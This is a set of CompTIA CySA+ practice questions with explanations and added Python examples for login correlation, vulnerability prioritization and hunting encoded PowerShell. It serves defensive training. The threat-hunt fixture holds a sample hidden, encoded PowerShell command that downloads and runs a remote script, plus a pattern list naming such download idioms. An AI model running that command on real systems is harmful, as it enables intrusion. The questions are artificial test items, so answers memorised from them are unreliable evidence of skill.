CompTIA CS0-003 Sample Questions with Explanations

CompTIA CS0-003 sample questions with explanations, traps, topic labels, and IT Mastery route links.

These original sample questions are designed to help you check how the exam topics appear in decision-style prompts. They are not taken from the live exam.

Use these sample questions as a guided self-assessment for CompTIA CySA+ (CS0-003) topics such as SOC triage, SIEM correlation, vulnerability management, incident response, threat hunting, endpoint evidence, cloud logs, reporting, and control improvement. The prompts emphasize analyst workflow and risk prioritization.

Where these questions fit in the CS0-003 guide

The sample set below is part of the CompTIA CySA+ guide path:

CS0-003 analyst sample questions

Work through each prompt before opening the explanation. CySA+ questions usually reward evidence correlation, risk-based priority, safe containment, and clear reporting.


Question 1

Topic: Correlating a suspicious login

A SIEM alert flags impossible travel for a user with access to sensitive data. The user recently enrolled a new device, and there are several failed MFA attempts before a successful login. What should the analyst do first?

  • A. Close the alert because the user eventually completed MFA.
  • B. Correlate identity logs, MFA events, device details, source locations, token activity, and recent privilege changes to validate scope and confidence.
  • C. Reimage all servers because any login alert means full compromise.
  • D. Delete all authentication logs to protect user privacy.

Best answer: B

Explanation: CySA+ triage starts with correlation. Before classifying the event, the analyst needs identity, device, MFA, location, token, and privilege context so that scope and confidence rest on evidence rather than on a single alert; that evidence then drives a proportionate response, such as revoking active sessions and the newly enrolled device, rather than either closing the alert or reimaging unrelated systems.

Why the other choices are weaker:

  • A ignores suspicious failed attempts and device enrollment context.
  • C overreacts without evidence of host compromise.
  • D destroys investigation and audit evidence.

What this tests: SIEM triage, identity logs, MFA, impossible travel, alert validation, and scope.

Related topics: SIEM; Identity; MFA; Triage
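The correlation described in the explanation, as an added example that is not part of the original page: it pulls one user's sign-in, MFA, device-enrollment and role-change events together, tests the impossible-travel claim with a great-circle speed check, counts MFA failures from the same source before the successful login, and looks for a device enrolled just before it and a privilege change just after. The event schema, the constructed events, the 900 km/h plausibility threshold and the confidence scale are assumptions.

```python
"""Correlate sign-in, MFA, device-enrollment and role-change events for one user.

Added example, not part of the original page. The event schema, the
constructed events and the 900 km/h plausibility threshold are assumptions.
"""
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_KMH = 900  # assumption: faster than an airliner counts as "impossible travel"

# Constructed sample events for one account, in the rough shape an identity
# provider exports. Geo fields are only present on sign-in events.
EVENTS = [
    {"ts": "2026-05-10T08:02:00Z", "type": "signin", "ip": "203.0.113.7",
     "lat": 51.51, "lon": -0.13, "result": "success"},
    {"ts": "2026-05-10T09:40:00Z", "type": "device_enroll", "ip": "198.51.100.22",
     "device": "iPhone (new)"},
    {"ts": "2026-05-10T09:41:10Z", "type": "mfa", "ip": "198.51.100.22", "result": "failure"},
    {"ts": "2026-05-10T09:41:40Z", "type": "mfa", "ip": "198.51.100.22", "result": "failure"},
    {"ts": "2026-05-10T09:42:05Z", "type": "mfa", "ip": "198.51.100.22", "result": "failure"},
    {"ts": "2026-05-10T09:43:00Z", "type": "signin", "ip": "198.51.100.22",
     "lat": 35.68, "lon": 139.69, "result": "success"},
    {"ts": "2026-05-10T09:50:00Z", "type": "role_change", "detail": "added to Finance-Admins"},
]


def parse_ts(s):
    """Parse the ISO-8601 UTC timestamps used in the sample events."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points."""
    p1, p2 = radians(lat1), radians(lat2)
    a = sin(radians(lat2 - lat1) / 2) ** 2 + cos(p1) * cos(p2) * sin(radians(lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def triage(events, max_kmh=MAX_PLAUSIBLE_KMH, enroll_window_s=3600):
    """Return the correlated signals behind an impossible-travel alert and a verdict."""
    ev = sorted(events, key=lambda e: parse_ts(e["ts"]))
    logins = [e for e in ev if e["type"] == "signin" and e["result"] == "success"]
    f = {"impossible_travel": False, "speed_kmh": 0.0, "mfa_failures_before_login": 0,
         "new_device_before_login": False, "privilege_change_after_login": False}
    if len(logins) >= 2:
        prev, cur = logins[-2], logins[-1]
        t_prev, t_cur = parse_ts(prev["ts"]), parse_ts(cur["ts"])
        km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
        hours = (t_cur - t_prev).total_seconds() / 3600
        f["speed_kmh"] = round(km / hours, 1) if hours > 0 else float("inf")
        f["impossible_travel"] = f["speed_kmh"] > max_kmh
        # MFA failures from the same source in the run-up to the suspicious login
        f["mfa_failures_before_login"] = sum(
            1 for e in ev if e["type"] == "mfa" and e["result"] == "failure"
            and e["ip"] == cur["ip"] and parse_ts(e["ts"]) < t_cur)
        # A device enrolled shortly before the login is a classic MFA-bypass indicator
        f["new_device_before_login"] = any(
            e["type"] == "device_enroll"
            and 0 <= (t_cur - parse_ts(e["ts"])).total_seconds() <= enroll_window_s for e in ev)
        # Privilege changes after the login widen the blast radius and the scope of review
        f["privilege_change_after_login"] = any(
            e["type"] == "role_change" and parse_ts(e["ts"]) > t_cur for e in ev)
    corroborating = [f["impossible_travel"], f["mfa_failures_before_login"] >= 3,
                     f["new_device_before_login"], f["privilege_change_after_login"]]
    f["confidence"] = sum(corroborating)  # 0..4 independent signals agreeing
    f["verdict"] = "escalate" if f["confidence"] >= 2 else "monitor"
    return f


if __name__ == "__main__":
    for k, v in triage(EVENTS).items():
        print(f"{k:>28}: {v}")
```

Run against the constructed events, all four signals agree and the verdict is "escalate"; with only the first sign-in present there is nothing to correlate and the same function returns "monitor", which is the point: the alert alone is not the finding, the corroborating context is.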


Question 2

Topic: Risk-based vulnerability priority

A vulnerability queue contains a high CVSS finding on an internal test server and a medium CVSS finding on an internet-facing production API with exploit attempts in WAF logs. Which should be prioritized first?

  • A. The internal test server, because high CVSS always has highest priority.
  • B. Neither, because vulnerability scanners are never useful.
  • C. The internet-facing production API, because exposure and active exploit evidence can outweigh raw CVSS score alone.
  • D. The oldest ticket, regardless of exploitability or business impact.

Best answer: C

Explanation: CySA+ prioritization combines severity with exposure, exploitability, asset criticality, and observed activity. A medium-severity flaw that is reachable from the internet on a production system and is already being probed carries more immediate risk than a higher-scoring flaw on an isolated test host.

Why the other choices are weaker:

  • A uses CVSS without business and threat context.
  • B discards useful vulnerability data.
  • D ignores current risk.

What this tests: Vulnerability management, exploitability, exposure, asset value, WAF evidence, and remediation priority.

Related topics: Vulnerability management; Risk; WAF logs; Prioritization
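The prioritization logic from the explanation, as an added example that is not part of the original page: it starts from the CVSS base score and scales it by asset criticality, internet exposure, observed exploit attempts, known-exploited status and compensating controls, then contrasts the result with the CVSS-only ordering that answer A assumes. The multipliers, field names and the two constructed findings are assumptions chosen to mirror the question.

```python
"""Rank vulnerability findings by exposure, exploit evidence and asset value, not CVSS alone.

Added example, not part of the original page. The multipliers, field names and
the two constructed findings are assumptions chosen to mirror the question.
"""

# Constructed findings: the internal test server with a high CVSS score and the
# internet-facing production API with a medium score plus exploit attempts in WAF logs.
FINDINGS = [
    {"id": "VULN-A", "asset": "test-srv-01", "cvss": 9.1, "internet_facing": False,
     "asset_criticality": "low", "exploit_attempts_24h": 0, "known_exploited": False,
     "compensating_controls": True},
    {"id": "VULN-B", "asset": "api-prod-03", "cvss": 6.4, "internet_facing": True,
     "asset_criticality": "high", "exploit_attempts_24h": 37, "known_exploited": False,
     "compensating_controls": False},
]

CRITICALITY_WEIGHT = {"low": 0.5, "medium": 1.0, "high": 1.5, "critical": 2.0}  # assumption


def priority_score(f):
    """Start from CVSS and scale it by the context that CySA+ prioritization adds."""
    score, reasons = f["cvss"], []
    score *= CRITICALITY_WEIGHT[f["asset_criticality"]]
    reasons.append(f"asset criticality {f['asset_criticality']}")
    if f["internet_facing"]:
        score *= 1.5
        reasons.append("internet-facing")
    if f["exploit_attempts_24h"] > 0:
        score *= 2.0  # observed attack traffic is the strongest single signal here
        reasons.append(f"{f['exploit_attempts_24h']} exploit attempts in WAF logs (24h)")
    if f["known_exploited"]:
        score *= 1.5
        reasons.append("on a known-exploited list")
    if f["compensating_controls"]:
        score *= 0.8
        reasons.append("compensating controls present")
    return round(score, 2), reasons


def rank(findings):
    """Return findings ordered by contextual priority, highest first, with the reasons."""
    scored = []
    for f in findings:
        score, reasons = priority_score(f)
        scored.append({"id": f["id"], "asset": f["asset"], "cvss": f["cvss"],
                       "priority": score, "reasons": reasons})
    return sorted(scored, key=lambda r: r["priority"], reverse=True)


def cvss_only_rank(findings):
    """The naive ordering that answer A assumes: raw CVSS, highest first."""
    return [f["id"] for f in sorted(findings, key=lambda f: f["cvss"], reverse=True)]


if __name__ == "__main__":
    print("CVSS only:", cvss_only_rank(FINDINGS))
    for r in rank(FINDINGS):
        print(f"{r['id']} ({r['asset']}) CVSS {r['cvss']} -> priority {r['priority']}: "
              + ", ".join(r["reasons"]))
```

The two orderings disagree: CVSS alone puts the test server first, while the contextual score puts the production API well ahead. Keeping the reasons alongside the score matters for the reporting objective too, because the ticket owner should see why a "medium" jumped the queue.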


Question 3

Topic: Endpoint containment order

EDR reports suspicious process activity and outbound connections from one workstation. The host is used by an accounting employee and contains sensitive files. What is the strongest containment step?

  • A. Wipe the workstation immediately before collecting any evidence.
  • B. Tell the user to continue working until the next patch window.
  • C. Disable all security tools so the process can be observed without interference.
  • D. Isolate the workstation using approved EDR or network controls while preserving process, file, network, and timeline evidence.

Best answer: D

Explanation: Containment should limit harm and preserve investigation value. Isolating the host through EDR or network controls stops the suspicious outbound connections while keeping volatile process, file, and network evidence available; wiping before scope and root cause are understood destroys that evidence and can leave other compromised hosts undiscovered.

Why the other choices are weaker:

  • A can destroy evidence.
  • B leaves potential compromise active.
  • C weakens visibility and control.

What this tests: Incident response, EDR, containment, evidence preservation, and sensitive asset handling.

Related topics: Incident response; EDR; Containment; Evidence


Question 4

Topic: Threat hunting hypothesis

A threat hunt begins with the hypothesis that attackers may be using encoded PowerShell commands after phishing. Which data and query approach is strongest?

  • A. Search only firewall denies, because process execution is unrelated to threat hunting.
  • B. Ask users whether they remember clicking a link and stop there.
  • C. Search endpoint process telemetry for PowerShell command lines, parent processes, encoded flags, user context, and follow-on network connections.
  • D. Delete all PowerShell logs because encoded commands are hard to read.

Best answer: C

Explanation: Hypothesis-driven hunting starts with expected behavior and the data source most likely to show it. Process telemetry and command-line evidence match the stated technique.

Why the other choices are weaker:

  • A may be useful later but misses host process behavior.
  • B is weak evidence and does not validate the technique.
  • D destroys the hunting data source.

What this tests: Threat hunting, hypothesis, endpoint telemetry, process trees, command-line analysis, and follow-on activity.

Related topics: Threat hunting; PowerShell; Endpoint telemetry; Process analysis
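The hunt described in the explanation, as an added example that is not part of the original page: it runs over constructed Sysmon-style process-creation and network-connection events, finds PowerShell launches carrying an encoded command under any of the prefixes powershell.exe accepts for -EncodedCommand, decodes the base64 UTF-16LE payload, and scores each hit by parent process, decoded content, user context, hidden-window switches and follow-on network connections from the same process. The field names, the parent and content watchlists, the scoring and the sample events are assumptions.

```python
"""Hunt process telemetry for encoded PowerShell launched from phishing-style parents.

Added example, not part of the original page. The Sysmon-style field names,
the parent-process and content watchlists, the scoring and the constructed
events are assumptions for illustration.
"""
import base64
import re
from datetime import datetime

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix, longest first, followed by a base64 blob.
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(len("encodedcommand"), 0, -1))
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]+)" % _PREFIXES)

# Assumed watchlists: Office/reader/script hosts as parents, and download-and-run idioms.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "acrord32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_CONTENT = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|invoke-webrequest")


def _b64_utf16(script):
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed Sysmon-style telemetry: EventID 1 = process create, EventID 3 = network connect.
EVENTS = [
    {"EventID": 1, "UtcTime": "2026-05-10 09:12:01", "ProcessId": 4412, "User": "CORP\\jdoe",
     "Image": POWERSHELL,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _b64_utf16(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.22/a.ps1')")},
    {"EventID": 3, "UtcTime": "2026-05-10 09:12:03", "ProcessId": 4412, "Image": POWERSHELL,
     "DestinationIp": "198.51.100.22", "DestinationPort": 80},
    {"EventID": 1, "UtcTime": "2026-05-10 09:15:00", "ProcessId": 5120,
     "User": "NT AUTHORITY\\SYSTEM", "Image": POWERSHELL,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"EventID": 1, "UtcTime": "2026-05-10 09:20:00", "ProcessId": 6001,
     "User": "NT AUTHORITY\\SYSTEM", "Image": POWERSHELL,
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": "powershell.exe -NonInteractive -EncodedCommand " + _b64_utf16(
         "Get-Service | Where-Object Status -eq 'Running'")},
]


def decode_encoded_command(cmdline):
    """Return the decoded script behind an -EncodedCommand flag, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""  # flag present but blob undecodable: still worth a look, so not None


def hunt(events, followup_window_s=60):
    """Score every encoded PowerShell launch by parent, content, user and follow-on network."""
    conns = [e for e in events if e["EventID"] == 3]
    results = []
    for p in (e for e in events if e["EventID"] == 1):
        decoded = decode_encoded_command(p["CommandLine"])
        if decoded is None:
            continue  # the hypothesis is about encoded commands; plain launches are out of scope
        parent = p["ParentImage"].rsplit("\\", 1)[-1].lower()
        t0 = _ts(p["UtcTime"])
        followups = [(c["DestinationIp"], c["DestinationPort"]) for c in conns
                     if c["ProcessId"] == p["ProcessId"]
                     and 0 <= (_ts(c["UtcTime"]) - t0).total_seconds() <= followup_window_s]
        signals = {
            "suspicious_parent": parent in SUSPICIOUS_PARENTS,
            "download_or_eval": bool(SUSPICIOUS_CONTENT.search(decoded)),
            "hidden_window": bool(re.search(r"(?i)-w(?:indowstyle)?\s+hidden", p["CommandLine"])),
            "network_followup": bool(followups),
            "interactive_user": not p["User"].upper().startswith("NT AUTHORITY\\"),
        }
        results.append({"pid": p["ProcessId"], "user": p["User"], "parent": parent,
                        "decoded": decoded, "followups": followups,
                        "signals": signals, "score": sum(signals.values())})
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in hunt(EVENTS):
        print(f"pid {r['pid']} score {r['score']} parent={r['parent']} user={r['user']}")
        print(f"  decoded: {r['decoded']!r}\n  followups: {r['followups']}")
```

Two of the three launches carry an encoded command, but only the one spawned by WINWORD.EXE in an interactive user's session, with a download-and-execute payload and a connection two seconds later, scores at the top; the management-agent launch decodes to a harmless service query and scores zero. Matching every prefix of -EncodedCommand matters because hunts that look only for the literal "-EncodedCommand" miss the "-enc" and "-e" forms that phishing payloads usually use; on real telemetry, use ProcessGuid rather than ProcessId to join process and network events, since PIDs are reused.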

Independent study note

Tech Exam Lexicon and IT Mastery are independent study tools. They are not affiliated with, endorsed by, or sponsored by CompTIA or any certification body.

Revised on Sunday, May 10, 2026